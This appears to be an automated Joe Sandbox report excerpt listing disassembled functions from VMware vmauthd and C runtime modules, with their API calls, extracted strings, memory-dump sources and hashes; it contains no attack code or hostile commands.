                                          • API ID: Name::operator+$NameName::$Decorator::getName::operator|=ReturnTypeoperator+
                                          • String ID: Y9n
                                          • API String ID: 1186856153-484334328
                                          • Opcode ID: d082c35e1da6cec6dff5b031ef539f4af2abfa100b95e14fe00b7744ae34bde0
                                          • Instruction ID: bb682cd90fd9264e580d092e03c380238b289f289daa73937d353ed76237a0c0
                                          • Opcode Fuzzy Hash: d082c35e1da6cec6dff5b031ef539f4af2abfa100b95e14fe00b7744ae34bde0
                                          • Instruction Fuzzy Hash: 08C171B5D00209AFCB04DFE8C895AEE77BDEF49304F10055EE552AB284FB359A44EB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00341A20 Relevance: 37.0, APIs: 14, Strings: 7, Instructions: 272COMMON
                                          Download Yara Rule
                                          APIs
                                          • Warning.VMWAREBASE(received %s command: %s,?,?), ref: 00341A5E
                                          • Warning.VMWAREBASE(?,?,0034A6D8), ref: 00341A7A
                                          • Warning.VMWAREBASE(00000000,?), ref: 00341A93
                                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000004), ref: 00341AD1
                                          • Warning.VMWAREBASE(00000025,?,?,00000000), ref: 00341B10
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00341B30
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000000,00000000), ref: 00341B78
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00341C58
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00341C6D
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00341C95
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00341C9C
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00341CAB
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00341CC1
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00341CD6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4088941987.0000000000341000.00000020.00000001.01000000.00000008.sdmp, Offset: 00340000, based on PE: true
                                          • Associated: 00000003.00000002.4088886858.0000000000340000.00000002.00000001.01000000.00000008.sdmpDownload File
                                          • Associated: 00000003.00000002.4088991089.000000000034A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                          • Associated: 00000003.00000002.4089031269.0000000000352000.00000002.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_340000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: free$Warning$calloc
                                          • String ID: Command '%s' not authorized for specified VM$Command '%s' not authorized to access the specific VM socket$Invalid arguments to '%s%s'$MEM_ALLOC %s:%d$P<kv$bora\apps\vmauthd\vmauthd.c$received %s command: %s
                                          • API String ID: 153094251-1093210316
                                          • Opcode ID: d1fd85cac5199552d9d609724a45a5e7f8ee0d483e5c0aaa971efd87a704210d
                                          • Instruction ID: e5236eba5761db3489a08e34883cdeff6dae0d7576ce46fbf16e9c479df0f11f
                                          • Opcode Fuzzy Hash: d1fd85cac5199552d9d609724a45a5e7f8ee0d483e5c0aaa971efd87a704210d
                                          • Instruction Fuzzy Hash: 2391A171A40605ABDB129FA4CD85BFFBBF9EF05304F040059E905AF241E736AE51CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E39D9D6 Relevance: 31.8, APIs: 11, Strings: 7, Instructions: 301COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • DName::operator+.LIBCMT ref: 6E39DAB3
                                          • UnDecorator::getSignedDimension.LIBCMT ref: 6E39DABE
                                          • UnDecorator::getSignedDimension.LIBCMT ref: 6E39DBB2
                                          • UnDecorator::getSignedDimension.LIBCMT ref: 6E39DBCF
                                          • UnDecorator::getSignedDimension.LIBCMT ref: 6E39DBEC
                                          • DName::operator+.LIBCMT ref: 6E39DC01
                                          • UnDecorator::getSignedDimension.LIBCMT ref: 6E39DC1B
                                          • atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000010,00000002,00000000,0000002C,00000000,0000007B,00000000,?,00000000), ref: 6E39DC3C
                                          • swprintf.LIBCMT ref: 6E39DC96
                                          • DName::operator+.LIBCMT ref: 6E39DCF1
                                            • Part of subcall function 6E399A8F: DName::DName.LIBVCRUNTIME ref: 6E399AED
                                          • DName::DName.LIBVCRUNTIME ref: 6E39DD68
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$atolswprintf
                                          • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr$|+uyo
                                          • API String ID: 2378214352-3803870015
                                          • Opcode ID: 9b1b5b8646b7f292f7e3413a5bbac37aa492e5bc77c28d79fe51d96ba8b84ea9
                                          • Instruction ID: 6bba9d8abb829dc216b431c44b907b66af27f8be743577157b99026b73f0d638
                                          • Opcode Fuzzy Hash: 9b1b5b8646b7f292f7e3413a5bbac37aa492e5bc77c28d79fe51d96ba8b84ea9
                                          • Instruction Fuzzy Hash: 1FA1BAB1D0820A9EDB04DFF8D996AEF77BCAF05304F904516D151AB190FB759A08EF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D16F7B0 Relevance: 30.3, APIs: 20, Instructions: 332COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name::operator+$NameName::$Decorator::getName::operator|=ReturnTypeoperator+
                                          • String ID:
                                          • API String ID: 1186856153-0
                                          • Opcode ID: 864fc39a688989fb6838284919b4cd78dd767a94c42bfa373e5b7e571149d0da
                                          • Instruction ID: 6d37c83f00446e8f057b3f2ff2ed168e2edd2d4c8e05ecec8d1b2b15ba2d2f22
                                          • Opcode Fuzzy Hash: 864fc39a688989fb6838284919b4cd78dd767a94c42bfa373e5b7e571149d0da
                                          • Instruction Fuzzy Hash: 46C1C472944249AFCF04CFA8C891EED7BB8FF19304F11405AE625E7298EBB49955CB70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E39CEE5 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 305COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • DName::operator+.LIBCMT ref: 6E39CF50
                                          • DName::operator+.LIBCMT ref: 6E39D093
                                            • Part of subcall function 6E398B63: shared_ptr.LIBCMT ref: 6E398B7F
                                          • DName::operator+.LIBCMT ref: 6E39D0DF
                                          • DName::operator+.LIBCMT ref: 6E39D0EE
                                          • DName::operator+.LIBCMT ref: 6E39D03E
                                            • Part of subcall function 6E39E791: DName::operator=.LIBVCRUNTIME ref: 6E39E820
                                          • DName::operator+.LIBCMT ref: 6E39D21A
                                          • DName::operator=.LIBVCRUNTIME ref: 6E39D25A
                                          • DName::DName.LIBVCRUNTIME ref: 6E39D272
                                          • DName::operator+.LIBCMT ref: 6E39D281
                                          • DName::operator+.LIBCMT ref: 6E39D28D
                                            • Part of subcall function 6E39E791: Replicator::operator[].LIBCMT ref: 6E39E7CE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name::operator+$Name::operator=$NameName::Replicator::operator[]shared_ptr
                                          • String ID: `anonymous namespace'
                                          • API String ID: 1026175760-3062148218
                                          • Opcode ID: c7a82b4cbb7355098a1a91bfa12687bf8d45f42707cb7aeab21ba11a8510550e
                                          • Instruction ID: 4afdba3d91a69f0e45086a71e917140fdd9c3249da47255ef85e406c6bf7e7b1
                                          • Opcode Fuzzy Hash: c7a82b4cbb7355098a1a91bfa12687bf8d45f42707cb7aeab21ba11a8510550e
                                          • Instruction Fuzzy Hash: ACC15BB19042099FDB14CFE8C855BEEBBF9BF49304F504859E196AB280FB759A48DF10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00346510 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 279COMMON
                                          Download Yara Rule
                                          APIs
                                          • Warning.VMWAREBASE(00000002,00000000,?,00000000,?,00346AB7,00000000,00000000,00000000,?,00000000), ref: 003465D9
                                          • wcschr.VCRUNTIME140(00000000,0000003D,00000000), ref: 00346624
                                          • wcschr.VCRUNTIME140(00000000,0000003D,?,?,?,?,?,?,?,00000000), ref: 0034664B
                                          • CompareStringOrdinal.KERNEL32(00000000,?,00000000,00000000,00000001,?,?,?,?,?,?,?,00000000), ref: 00346672
                                          • CompareStringOrdinal.KERNEL32(00000000,000000FF,00000000,?,00000001,?,?,?,?,?,00000000), ref: 003466CD
                                          • memcpy.VCRUNTIME140(00000000,00000000,-00000001,?,?,00000000), ref: 0034676B
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000), ref: 003467D6
                                            • Part of subcall function 003427C0: GetLastError.KERNEL32(?,?,00343B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 003427D8
                                            • Part of subcall function 003427C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00343B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 003427F3
                                            • Part of subcall function 003427C0: Warning.VMWAREBASE(?,0034A850,?,?,00001000,?,00000005,?,?,00343B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00342807
                                            • Part of subcall function 003427C0: _printf.MSPDB140-MSVCRT ref: 00342824
                                            • Part of subcall function 003427C0: SetLastError.KERNEL32(00000000,?,?,00343B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 0034282D
                                          Strings
                                          • The system environment block is too long. Please fix your environment block and try again., xrefs: 00346556
                                          • The system environment block appears to be corrupted (malformed key=value: %S). Please fix your environment block and try again., xrefs: 0034678D
                                          • P<kv, xrefs: 003467D6
                                          • Failed comparing system vs user environment keys: %S vs %S. Please fix the environment blocks and try again., xrefs: 00346796
                                          • Your environment block appears to be corrupted (malformed key=value: %S). Please fix your environment block and try again., xrefs: 003467BF
                                          • Failed comparing a key against user environment keys: %S vs %S. Please fix your environment block and try again., xrefs: 003467AB
                                          • The child environment block is too long. Please fix your environment block and try again., xrefs: 003465AE
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4088941987.0000000000341000.00000020.00000001.01000000.00000008.sdmp, Offset: 00340000, based on PE: true
                                          • Associated: 00000003.00000002.4088886858.0000000000340000.00000002.00000001.01000000.00000008.sdmpDownload File
                                          • Associated: 00000003.00000002.4088991089.000000000034A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                          • Associated: 00000003.00000002.4089031269.0000000000352000.00000002.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_340000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Warning$CompareErrorLastOrdinalStringwcschr$_printffreememcpy
                                          • String ID: Failed comparing a key against user environment keys: %S vs %S. Please fix your environment block and try again.$Failed comparing system vs user environment keys: %S vs %S. Please fix the environment blocks and try again.$P<kv$The child environment block is too long. Please fix your environment block and try again.$The system environment block appears to be corrupted (malformed key=value: %S). Please fix your environment block and try again.$The system environment block is too long. Please fix your environment block and try again.$Your environment block appears to be corrupted (malformed key=value: %S). Please fix your environment block and try again.
                                          • API String ID: 1816562336-453551589
                                          • Opcode ID: 9d1ca9cd4237b59cce8c772c22525de413bfab5d3bee842d7ad5f11e7f9f8f8b
                                          • Instruction ID: a05c96709d46d61f2a6b5b18933585176e32444181b2e831cae604ed853113cf
                                          • Opcode Fuzzy Hash: 9d1ca9cd4237b59cce8c772c22525de413bfab5d3bee842d7ad5f11e7f9f8f8b
                                          • Instruction Fuzzy Hash: 0C91D335E002159BCF26DF68C8526BEBBF5EF46704F1A4199E806AF280E7717E41C792
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E39E791 Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 186COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • Replicator::operator[].LIBCMT ref: 6E39E7CE
                                          • DName::operator=.LIBVCRUNTIME ref: 6E39E820
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name::operator=Replicator::operator[]
                                          • String ID: @$Y9n$`generic-type-$`template-parameter-$generic-type-$template-parameter-$|+uyo
                                          • API String ID: 3211817929-4006326660
                                          • Opcode ID: be9d163f1d2af8d23e071de9002245dd2624defd574913165ea688e2fea22d81
                                          • Instruction ID: db13c2403e10399a9a44de86d3a048db615d428495891dc1c3430cb2e03225ab
                                          • Opcode Fuzzy Hash: be9d163f1d2af8d23e071de9002245dd2624defd574913165ea688e2fea22d81
                                          • Instruction Fuzzy Hash: 6461D1B1D042099FDB04CFEAC840BEEBBFDBF09300F50441AE655A7290EB349949DBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D177A55 Relevance: 22.9, APIs: 15, Instructions: 357COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: _free$Info
                                          • String ID:
                                          • API String ID: 2509303402-0
                                          • Opcode ID: 847c0e8cdc6379c1934ba2e7f3cf5be87c9625b87d42e03de7b63ecb5b4ddd50
                                          • Instruction ID: aeb85880c2199b1639a5db5ebd46f862caefdae3c7e63607d2659db15a674294
                                          • Opcode Fuzzy Hash: 847c0e8cdc6379c1934ba2e7f3cf5be87c9625b87d42e03de7b63ecb5b4ddd50
                                          • Instruction Fuzzy Hash: 6ED1B071D0424A9FDB21CFB4C880BEEBBF5FF19304F10406AE995A7265DBB1A845CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00342610 Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 46COMMON
                                          Download Yara Rule
                                          APIs
                                          • Warning.VMWAREBASE(?,00000000), ref: 00342625
                                          • Warning.VMWAREBASE(00000000,vmware,?,00000000), ref: 00342632
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,vmware,?,00000000), ref: 00342638
                                          • Warning.VMWAREBASE ref: 0034263E
                                          • Warning.VMWAREBASE(?), ref: 00342647
                                          • Warning.VMWAREBASE(?,?), ref: 00342665
                                          • Warning.VMWAREBASE(00000001,authd.policy.allowRCForRead,?,?), ref: 00342671
                                          • Warning.VMWAREBASE(0000005A,vmauthd.startupTimeout,00000001,authd.policy.allowRCForRead,?,?), ref: 00342682
                                          • Warning.VMWAREBASE(?,0000005A,vmauthd.startupTimeout,00000001,authd.policy.allowRCForRead,?,?), ref: 0034268D
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(vmauthd,00000000,00000000,00000000,?,00000000,00000000,?,0034269A), ref: 00342864
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(?,?,00000000,00000000,?,0034269A), ref: 00342871
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(00000000,vmauthd,log.syslogID,?,?,00000000,00000000,?,0034269A), ref: 00342887
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(00000000,00000003,log.syslogMinLevel,00000000,vmauthd,log.syslogID,?,?,00000000,00000000,?,0034269A), ref: 00342894
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(?,?,?,?,?,?,?,?,00000000,00000000,?,0034269A), ref: 0034289C
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(?,?,?,?,?,?,?,?,00000000,00000000,?,0034269A), ref: 003428A3
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,0034269A), ref: 003428A9
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(00000000,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,0034269A), ref: 003428AF
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,0034269A), ref: 003428B5
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,0034269A), ref: 003428BB
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(vmauthd,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 003428C7
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(00000000,vmauthd,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 003428D2
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(?,00000000,vmauthd.log.fileName,?,?,00000000,00000000,?,0034269A), ref: 003428E7
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(00000000,?,vmauthd.log.fileName,?,?,00000000,00000000,?,0034269A), ref: 003428F6
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(00000000,%s\%s,00000000,vmauthd.log,?,?,vmauthd.log.fileName,?,?,00000000,00000000,?,0034269A), ref: 00342910
                                            • Part of subcall function 00342850: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,%s\%s,00000000,vmauthd.log,?,?,vmauthd.log.fileName,?,?,00000000,00000000,?,0034269A), ref: 00342918
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 0034292B
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00342939
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(00000000,vmauthd,log.suffix,00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00342949
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(00000000,00000001,log.systemAreaTemp,00000000,vmauthd,log.suffix,00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00342956
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(00000000,00000003,log.logMinLevel,00000000,00000001,log.systemAreaTemp,00000000,vmauthd,log.suffix,00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?), ref: 00342963
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,vmauthd.log.fileName,?,?), ref: 0034296B
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,vmauthd.log.fileName,?,?), ref: 00342972
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,vmauthd.log.fileName), ref: 00342978
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4088941987.0000000000341000.00000020.00000001.01000000.00000008.sdmp, Offset: 00340000, based on PE: true
                                          • Associated: 00000003.00000002.4088886858.0000000000340000.00000002.00000001.01000000.00000008.sdmpDownload File
                                          • Associated: 00000003.00000002.4088991089.000000000034A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                          • Associated: 00000003.00000002.4089031269.0000000000352000.00000002.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_340000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Warning$free
                                          • String ID: P<kv$authd.policy.allowRCForRead$vmauthd.startupTimeout$vmware
                                          • API String ID: 2642810717-554617529
                                          • Opcode ID: 100daa8a5af59919f889ed780377bc0c14a5f17ca0825b8a14d026824372944f
                                          • Instruction ID: aeece54dca900ab939ac0dd925bbcc15bb8a210144894899466623f445b432dc
                                          • Opcode Fuzzy Hash: 100daa8a5af59919f889ed780377bc0c14a5f17ca0825b8a14d026824372944f
                                          • Instruction Fuzzy Hash: AF015E34941208AACB03FFA5DC46ADFBBF8AF02701F400116F804AF2A2DB7479468796
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E396698 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 302COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • type_info::operator==.LIBVCRUNTIME ref: 6E3967B3
                                          • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0(19930522,00000000,1FFFFFFF,6E396CF0,?,?,00000000,00000000,00000000,?,?,?), ref: 6E3967CE
                                          • ___TypeMatch.LIBVCRUNTIME ref: 6E3968C1
                                          • __DestructExceptionObject.VCRUNTIME140(?,00000001,19930522,00000000,1FFFFFFF,6E396CF0,?,?,00000000,00000000,00000000,?,?,?), ref: 6E396945
                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(19930522,00000000,1FFFFFFF,6E396CF0,?,?,00000000,00000000,00000000,?,?,?), ref: 6E3969CC
                                          • __DestructExceptionObject.VCRUNTIME140(?,00000001,#9n,19930522,00000000,1FFFFFFF,6E396CF0,?,?,00000000,00000000,00000000,?,?,?), ref: 6E3969DA
                                          • _CxxThrowException.VCRUNTIME140(?,6E39FB64,#9n,19930522,00000000,1FFFFFFF,6E396CF0,?,?,00000000,00000000,00000000,?,?,?), ref: 6E3969F2
                                          • _UnwindNestedFrames.LIBCMT ref: 6E396A13
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Exception$DestructObject$FramesMatchNestedThrowTypeUnwindabortterminatetype_info::operator==
                                          • String ID: csm$csm$csm$#9n
                                          • API String ID: 1953119474-1570539047
                                          • Opcode ID: 291613404bfe396f15b67246994b42daabc9db5f8decd1879c7c29bdfd67c492
                                          • Instruction ID: 5d40089422aba660cf15d193c4e822e5a08632e79d7149d9aa6630130cb777ac
                                          • Opcode Fuzzy Hash: 291613404bfe396f15b67246994b42daabc9db5f8decd1879c7c29bdfd67c492
                                          • Instruction Fuzzy Hash: 30B18A7282220AEFCF04CFE4C88099EBBB9FF04314F11455AE8156B215E736DA51EBD2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E39B34F Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 125COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • DName::operator+.LIBCMT ref: 6E39B382
                                            • Part of subcall function 6E398B41: DName::operator+=.LIBCMT ref: 6E398B57
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name::operator+Name::operator+=
                                          • String ID: (!9n$`unknown ecsu'$class $coclass $cointerface $enum $h!9n(!9n$struct $union
                                          • API String ID: 382699925-3511251873
                                          • Opcode ID: c7269256fed77244e14d9d9c47d5e485c18df55bbf7af66e1b642f8a737ea3c1
                                          • Instruction ID: 73f433c9ec97a00a0cdf72a0550c336315e295b11151002d395901fdcad77048
                                          • Opcode Fuzzy Hash: c7269256fed77244e14d9d9c47d5e485c18df55bbf7af66e1b642f8a737ea3c1
                                          • Instruction Fuzzy Hash: 8C4148B5C0020ADFCF00CFE9D991AEEBBB8EF45304F10441AD655AB248E7759688EB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D167D16 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(6D1CB368,00000FA0,?,?,6D167CF4), ref: 6D167D22
                                          • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,6D167CF4), ref: 6D167D2D
                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6D167CF4), ref: 6D167D3E
                                          • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 6D167D50
                                          • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 6D167D5E
                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,6D167CF4), ref: 6D167D81
                                          • DeleteCriticalSection.KERNEL32(6D1CB368,00000007,?,?,6D167CF4), ref: 6D167D9D
                                          • CloseHandle.KERNEL32(00000000,?,?,6D167CF4), ref: 6D167DAD
                                          Strings
                                          • SleepConditionVariableCS, xrefs: 6D167D4A
                                          • kernel32.dll, xrefs: 6D167D39
                                          • WakeAllConditionVariable, xrefs: 6D167D56
                                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 6D167D28
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
